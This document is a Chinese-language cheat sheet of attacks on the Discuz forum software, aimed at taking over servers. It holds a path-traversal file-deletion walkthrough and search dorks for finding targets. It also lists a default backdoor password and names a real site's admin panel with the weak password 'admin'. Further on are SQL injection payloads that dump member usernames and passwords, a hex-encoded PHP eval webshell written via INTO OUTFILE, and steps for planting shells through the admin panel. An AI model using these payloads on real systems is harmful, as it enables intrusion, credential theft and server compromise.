discuz漏洞汇总

Discuz漏洞拿服务器

路径泄露
‘api/addons/zendcheck.php’,
‘api/addons/zendcheck52.php’,
‘api/addons/zendcheck53.php’,
‘source/plugin/mobile/api/1/index.php’,
‘source/plugin/mobile/extends/module/dz_digest.php’,
‘source/plugin/mobile/extends/module/dz_newpic.php’,
‘source/plugin/mobile/extends/module/dz_newreply.php’,
‘source/plugin/mobile/extends/module/dz_newthread.php’,
discuz任意文件删除
这里以Discuz3.2为例

关键字：
Powered by Discuz! X3.2

时间有限，就不一一截图了，Discuz所有页面全在Discuz_X3.2_SC_UTF8/upload/目录下

利用过程：

访问http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/robots.txt试试，这是我虚机中discuz中robots的路径，具体视个人情况而定

1、注册个帐号

2、提交数据

url地址栏：http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/home.php?mod=spacecp&ac=profile&op=base
POST数据：birthprovince=../../../robots.txt&profilesubmit=1&formhash=2bc7eb9a，这个formhash的值可以从源代码中找到，每次都不一样的

3、提交数据之后，打开设置界面，可以看到出生地变成../../../robots.txt

4、构造上传表单

//此formhash值和第三布formhash值一样

上传成功后，返回空白页面，然后访问http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/robots.txt，发现robots.txt已被删除

Google关键字以及常有目录：

范例：链接——关键字——CMS别称

范例：连接——正则表达式——匹配关键字——CMS别称

/——Powered by.*?<——Discuz!——Discuz(康盛)

/——Powered by.*?——Discuz!——Discuz(康盛)

/robots.txt——discuz——Discuz(康盛)

/bbcode.js——discuz——Discuz(康盛)

/newsfader.js——discuz——Discuz(康盛)

/templates.cdb——discuz——Discuz(康盛)

/u2upopup.js——discuz——Discuz(康盛)

/admin/discuzfiles.md5——discuz——Discuz(康盛)

/api/manyou/cloud_channel.htm——discuz——Discuz(康盛)

/images/admincp/admincp.js——discuz——Discuz(康盛)

/include/javascript/ajax.js——discuz——Discuz(康盛)

/mspace/default/style.ini——discuz——Discuz(康盛)

/plugins/manyou/discuz_plugin_manyou.xml——discuz——Discuz(康盛)

/source/plugin/myapp/discuz_plugin_myapp.xml——discuz——Discuz(康盛)

/static/js/admincp.js——discuz——Discuz(康盛)

/template/default/common/common.css——discuz——Discuz(康盛)

/uc_server/view/default/admin_frame_main.htm——discuz——Discuz(康盛)

/bbcode.js——discuz——Discuz(康盛)

/newsfader.js——discuz——Discuz(康盛)

/templates.cdb——discuz——Discuz(康盛)

/u2upopup.js——discuz——Discuz(康盛)

/mspace/default1/style.ini——discuz——Discuz(康盛)

/uc_server/view/default/admin_frame_main.htm——discuz——Discuz(康盛)

Discuz的基本漏洞：

discuz x1.5 discuz 7.2 后台getshell 0day通杀0day

Discuz 某插件SQL注入漏洞

Discuz! 7.1 & 7.2 远程代码执行漏洞

discuz! 7.2 manyou插件暴路径&Get Webshell 0day

Discuz! 7.2-X1 心情墙插件SQL注入及持久型XSS漏洞

Discuz!账号发放插件注入0day

Discuz7.X通杀0day漏洞(UCenter Home-2.0)

1， dz-ychat插件注入漏洞

漏洞链接：http://.../plugin.php?id=ychat&mod=rooms&cid=6x

2， dz-sql注入

漏洞链接：http://www.xxcom/faq.php?action=…

3， 源代码外泄下载导致漏洞的发生

漏洞链接：http://*.com/bbs.tar.gz

4， Discuz急诊箱没有关闭，默认密码188281MWWxjk即可登录

漏洞链接：http://www.**.com/source/plugin/tools/tools.php

5， Discuz弱口令导致漏洞的发生

漏洞链接：http://bbs.wan.58.com/uc_server/admin.php

http://bbs.wan.58.com/uc_server/admin.php?sid=b962WHAGm3MydvyKLeEcvoQSS7pPPjkGuZTz270fNQqi5F6HeOsah6osA7nzMTxlpuiMuJAz3%2BZADQ 弱口令admin

6， discuz X2.5

漏洞描述：广播回复存在 xss漏洞 html、脚本未过滤

7， discus x2 SQL注入漏洞

漏洞链接：http://www.**.com/source\module\forum\forum_attachment.php

8， 基本的路径的文件

/uc_server/control/admin/db.php

/source/plugin/myrepeats/table/table_myrepeats.php

/install/include/install_lang.php

9， dz x1.5 dzx7.2漏洞

后台：插件–添加插件–请选择导入方式:上传本帖附件中的XML文件并同时勾选上 允许导入不同版本 Discuz! 的插件(易产生错误!!)

shell地址就为：data/plugindata/shell.lang.php(discuz x1.5 )

shell地址就为：forumdata/plugins/shell.lang.php (discuz 7.2)

10,Discuz7.X通杀0day漏洞(UCenter Home-2.0)

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

   Vuln file : Shop.php

Poc文件

shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

11, dz账号发放插件注入0day

2Fly 序号发放系统

文件2fly_gift.php

Exp文件

Exp:http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members

关键字查找：

inurl:2fly_gift.php

12,dz7.2 心情墙插件

存在xss插件，持久性的

在发表心情处直接插入html代码

“>

Sql注入网站，比较鸡肋，已经差不多没有le

漏洞链接：http://www.**.com/plugin.php?id=moodwall&action=edit_mood&moodid=2

13,dz manyou插件暴路径

文件./manyou.source/notice.php

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=‘ union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile ‘C:/inetpub/wwwroot/shell.php‘%23

/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径

14,dz备份文件的一些基本的路径

/config/config_global.php.bak

/config/config_ucenter.php.bak

/config.inc.php.bak

15,dz6.1后台拿shell

http://127.0.0.1/discuz/admincp.php?action=runwizard&frames=yes

admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell